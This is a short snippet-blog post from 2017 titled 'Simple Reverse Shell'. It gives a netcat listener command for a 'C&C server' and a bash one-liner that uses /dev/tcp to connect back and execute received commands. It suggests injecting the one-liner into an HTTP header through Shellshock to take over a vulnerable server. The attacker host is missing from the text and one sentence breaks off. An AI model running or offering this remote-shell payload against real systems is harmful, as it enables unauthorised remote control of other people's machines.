Simple Reverse Shell

Published: 2017-05-14 12:39:38 +0000
Categories: BASH,




The below is an example of a simple reverse shell to a C&C server (which we assume is

On the C&C server you simply need something listening on the relevant port:

nc -l 4444

Back when Shellshock was at it's highest levels, you could simply inject this into a HTTP header to have the server connect back to you


exec 5<>/dev/tcp/ ; cat <&5 | while read evil; do $evil 2>&5 >&5; done


  • Kernel /dev/tcp support (present by default in most builds)
  • Sufficiently loose egress controls on the victim's network


Reverse, Shell, exec, Example,

Latest Posts

Remotely backing up PFsense Configuration (BASH)
FFMPEG: Converting RMVB to X264 MP4 (BASH)
Recursively print table (print_r equivalent) (LUA)
Bulk Delete Comments from (Self-Hosted) JIRA Issues (Misc)
Add a static entry to the ARP table (BASH)
SSL Cipher Hex codes to Human Readable Names (Misc)
Convert Ascii to Binary (BASH)
Intercepting Outbound DNS Queries (BASH)
Handle Google Verification files within NGinx Configuration (NGinx)
Getting WhatsApp Rich Snippet Previews Working (Misc)

Copyright © 2018 Ben Tasker | Sitemap | Privacy Policy
Available at and snippets.6zdgh5a5e6zpchdz.onion